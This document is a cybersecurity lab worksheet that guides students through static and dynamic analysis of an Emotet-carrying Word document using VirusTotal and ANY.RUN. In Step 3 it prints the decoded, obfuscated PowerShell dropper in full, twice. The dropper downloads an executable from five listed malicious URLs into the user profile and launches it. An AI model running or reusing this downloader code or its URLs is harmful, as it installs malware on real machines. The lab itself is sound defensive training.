Objectives
In this lab, you will complete the following objectives:
- Part 1: Perform Static Malware Analysis
- Part 2: Perform Dynamic Malware Analysis
- Part 3: Investigate the Exploit
Introduction
There are many malware analysis tools that are available online. These tools provide reference and analysis functions. For example, you can submit indicators of compromise (IOC), such as file hashes, URLs, or IP addresses, and the tool will look up the IOC and return information about exploits that share these characteristics. Suspicious files can also be submitted. Static malware analysis can submit the file to a collection of antivirus programs and return the results. Further analysis may also be conducted by dissecting the files at the binary level. Online sandboxes will conduct dynamic malware analysis in which the malware exploit is actually run in the same way that it infects a vulnerable host computer. This is done by executing the malware in a virtual machine with special tools that monitor the behavior of the malware. This is known as a malware sandbox.
Dynamic malware analysis provides rich insights into the behavior of the malware and the artifacts that it creates. This information can be used to identify new or updated versions of malware, evaluate the effects of an infection, and lead to discoveries of further exploits. For example, some malware is used as a delivery service for other malware exploits. The delivery service malware may be identified, but the malware that it has delivered may not be. Dynamic analysis can reveal what was delivered and the exploit can be further investigated. In this lab, you will use two online malware investigation tools to learn about an exploit.
Scenario
You are working at XYZ, Inc. as a cyber technician. You have been asked to help a cybersecurity analyst evaluate security alerts that have been generated by your Intrusion Prevention System (IPS). The IPS has flagged a series of events as potentially malicious. The analyst has provided you with a group of potential IOCs to investigate. You are using two online tools to perform static and dynamic analysis based on the IOCs. While it is also possible to submit malware files, the analyst feels it is better for you to use the IOCs until you have more experience handling real malware files.
Required Resources
- 1 PC with internet access
Instructions
Part 1: Perform Static Malware Analysis
In this part, you will submit a file hash to an online service that will look up the hash and return information about the associated malware file. The file hash is a computed representation, or fingerprint, for a file. File hashes are unique and extremely difficult to duplicate.
Step 1: Submit the hash.
In this step, you will submit the hash value to a static malware analysis tool that provides you with further information about the malware file if it is known to the tool.
- On your PC, navigate to the VirusTotal site.
- The file hash that you have received is:
- VirusTotal has information for the file, which means a file with the same hash has been previously submitted for analysis. You will see the results of the analysis.
Select and copy the hash value. Select the Search entry on the VirusTotal menu and paste the hash into the search box. Press the Enter key to execute the search.
Step 2: Interpret virus total information.
- VirusTotal submits files that have been uploaded by the public to a number of antivirus agents for analysis. In this case it has submitted to 63 antivirus products.
- Select the Details tab. Here you can learn more about the file. Review the information provided. Note that some of this information may not be accurate and may require confirmation with other sites.
- Switch to the Relations tab. Here you can see IOCs such the IP addresses, websites, and domains that the malware attempted to contact. You will also see hashes for files that it created or downloaded from those domains. In addition, you can see files and processes that are related to execution of the malware on the host computer.
- Switch to the Behavior tab. Review the information that is available here. Below the menu bar is a list that allows you to select information from different malware sandboxes. Select VMRay if it is not selected already.
The malware uses shell commands to open programs and processes. Locate the information about the shell commands that are executed during the exploit. This malware opens MS Windows PowerShell and passes a value to it.
- Select the Community tab. Look at the two submissions by thor. These are YARA signatures rendered by the THOR APT Scanner, a compromise assessment tool by Nextron Systems. Review the signatures. You don’t need to understand everything in them.
Part 2: Perform Dynamic Malware Analysis
Now we will use another tool to review the results of a dynamic analysis on a malware file that was submitted by the community. ANY.RUN is a company that offers a unique online dynamic and interactive sandbox. ANY.RUN offers a free service in which community users can upload suspected malware files for analysis. It provides a very rich set of analyses that provide a view into the behavior of the malware. Subscribers to the full version of ANY.RUN are able to run the malware on a virtual machine and interact with the malware if user actions are required to trigger it. Free users are only able to run malware samples on a 32-bit Windows 7 virtual machine, however paying subscribers can choose the operating system that fits their environment.
The ANY.RUN sandbox will dynamically run the malware and display details of what the malware does in the analysis interface. Paying users can also interact with the sandbox VM in which the malware is run. They can respond to prompts from the malware and inspect the infected operating system.
Like VirusTotal, you can look up IOCs to see the results of previously completed dynamic or interactive analyses. In this part of the lab, we will submit the same file hash to ANY.RUN and review the results.
Step 1: Access ANY.RUN and Submit IOC
- In a web browser, navigate to ANY.RUN. Select Products > Sandbox from the menu to move to the sandbox service interface. Click Get started to continue. If prompted to sign in or sign up, close the window to skip the sign in process.
- Select Reports to view the public submissions for our IOC.
- Paste the hash from Part 1 into the search box in the upper right of the window and press enter.
ANY.RUN provides a real-time dashboard of the current malware threat landscape with statistics regarding the distribution of malware threats and the ratio of recent submissions that have been determined as malicious, suspicious, or no threat.
Here, you can see the list of public tasks that can be accessed. They are arranged by the most recent submission. The tasks are labelled with the analysis verdict. Some are confirmed to be malware and others are benign files and others are suspicious.
You will see a page of malware exploits that have an artifact that corresponds to the hash value.
- Locate and select the oldest entry for file Data-5544-J5823545.doc. If it does not execute fully, select another entry for the same file, Data-5544-J5823545.doc.
Note: ANY.RUN executes the malware in their sandbox. Sometimes the malware does not execute fully, so some submissions will not include details of the entire exploit. For example, if access to a command-and-control (CnC or C2) server on the internet is required, it is possible that the server will not be available. If that is the case, the exploit may cease execution before it has reached its goal. For this reason, it is important to look at several of the entries in the search results to find one that appears to have fully run.
Step 2: Explore the interface
The ANY.RUN analysis interface provides very deep insights to many aspects of the malware behavior.
- The computer desktop that is shown consists of a series of screen grabs of the computer desktop at different stages of the malware infection process. Mouse over the image and move the mouse right or left to move through the screenshots. In many cases, there is nothing to see because the malware displays nothing on the screen as it works. Sometimes, if user input is required to execute the malware, instead of a screen grab, you may see a movie that captures the user actions that were conducted as part of the malware infection process.
- On the right-hand side of the screen, you will see a group of blue bars that are displayed in a nested tree-like structure. This is a process tree. It shows all the software processes that were used in the exploit. Some of them are windows software components, and others are part of the malware.
- Select the first process in the tree. Information about this process appears below the tree. Select More Info to see additional details for the process.
Step 3: Analyze an Obfuscated Script
- Close the More Info window by selecting the “x” in the upper right-hand corner. Select the next suspicious or malicious process below the MS Word process. Select More Info to view the details.
- In the Advanced Details of Process (More Info) window, look at the command line entry. This is the command that was issued by the malware macro in the Word document. You can see the powershell command and two arguments that were passed to the command, and then the long string that we saw before. This string is an obfuscated script that is part of the attack.
- Copy the string using the copy icon next to the heading Command line.
- Paste the copied text into a text file. In the text file, remove the string, powershell -nop -e. Save and leave the file open.
- From a web browser, search for an online base64 decoder. Decode the edited text using the online decoder. Select auto detect for the source character set if it is available in the online decoder. You may need to try a few different decoders.
- Save the decoded text in another text file. The content of the decoded text should be similar to the displayed text below.
- The text is still a bit hard to read, but you can probably pick out some familiar features. We will use the search and replace tool in a text editor to make it a bit easier to read.
- Save the file if desired.
$R3ZtKC='FCams3Q';$d1mU0azd = 184';$XMzUsP='PD2Qisza';$tZTLXzZq=$env:userprofile+'/'+$d1mU0azd+'.exe';$zlBUq6='Q0HuEwi';$pTl4Jz=.('n'+'e'+'w-object') nET.W`EbC`Li`Ent;$NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/@http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/@http://ab.fitzio.com/cgi-bin/opiFtEAsf/@http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/@http://thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit('@');$NOBJJj='Eo1jszRQ';foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq);$SHHj3v='Mpi_Cz1s';If ((.('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421) {[Diagnostics.Process]::sTarT($tZTLXzZq);$s1EoklR='fL2dzmIj';break;$TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLbpU'
Be sure to use regular expression mode in the text editor to replace ; (semicolon) and @ with /n. The formatted code should look like this:
1 $R3ZtKC='FCams3Q'
2 $d1mU0azd = '184'
3 $XMzUsP='PD2Qisza'
4 $tZTLXzZq=$env:userprofile+'/'+$d1mU0azd+'.exe'
5 $zlBUq6='Q0HuEwi'
6 $pTl4Jz=.('n'+'e'+'w-object') nET.W`EbC`Li`Ent
7 $NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/
8 http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/
9 http://ab.fitzio.com/cgi-bin/opiFtEAsf/
10 http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/
11 http://thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit('
12 ')
13 $NOBJJj='Eo1jszRQ'
14 foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq )
15 $SHHj3v='Mpi_Cz1s'
16 If ((.('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421) {[Diagnostics.Process] ::sTarT($tZTLXzZq)
17 $s1EoklR='fL2dzmIj'
18 break
19 $TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLbpU'
Note: The line numbers at the beginning of each line are for reference only, and they are not part of the results.
Step 4: Interpret the Malware Script
Although the file is still hard to read because it uses random groups of characters for variable names and values, and also attempts to obfuscate commands by using erratic capitalization and other means, a little knowledge of programming can help you to get an idea of what is going on.
- Notice that a series of URLs appear in the code. Submit several of them to ANY.RUN, VirusTotal, or another service to see if they are malicious.
- Note that the variable name, $tZTLXzZq appears in line four of the code above. Its value is concatenated with the text ‘.exe’.
- Look at line 14. The command is foreach($j5YzrQKQ in $NUzAMAR).
Step 5: View Details of Malware Connections and Known Threats
- Below the desktop view, are a series of tabs that provide details of the malware behavior. The first tab shows the network behavior and the known threats. Select the HTTP requests tab. It shows the processes that attempted to make connections over HTTP.
Warning: It is not recommended that you attempt to connect to any of these URLs.
- Select the Connections tab. Here you can see a timeline of the connections that were made during the malware exploit. On the DNS Requests tab, you can see the DNS requests that were made by the malware. Note that you can download PCAPs for the connections and DNS requests. These files can be opened in Wireshark for further review.
- Select the Threats tab. Here you will see Suricata IPS alert messages called signature identifiers (SID). These alerts are triggered by various malware behaviors as detected by IDS/IPS rules. These messages are used by various network security monitoring platforms.
Part 3: Investigate the Exploit
We have investigated a number of characteristics of this exploit, but we have not learned much about the exploit itself. ANY.RUN maintains a malware encyclopedia called the Tracker. If a Tracker article exists for the malware sample, ANY.RUN links to the article.
Note: You may need to register for an account in Any.Run to view some of the features discussed in this part.
- In the pane on the right-hand side of the interface, at top, is a header that provides information about the malware, including the MD5 hash for the file, the time it took to run the exploit in the sandbox, and a series of tags. If you select a tag, you will be taken to a tasks search that will list all the submitted exploits that share that tag.
- Under the tags are several buttons. Select IOC to see all the IOCs for the submitted malware. These IOCs are diagnostic for the exploit. Finding any of them in your network monitoring data can indicate an exploit.
- Finally, below the tags is a link to Tracker. As indicated the malware exploit is known and Emotet. Select the link to read about Emotet and answer the questions below.
- Return to the analysis page for the Emotet malware variant that we have been working with. Beneath the name of the malware file, you will see a series of tags. Select the Emotet tag. This will execute a search for other malware that has been identified as Emotet. Select into several of the Public Submission reports until you find several that appear to have successfully executed in the sandbox. You should see a number of HTTP requests that occurred during the infection process.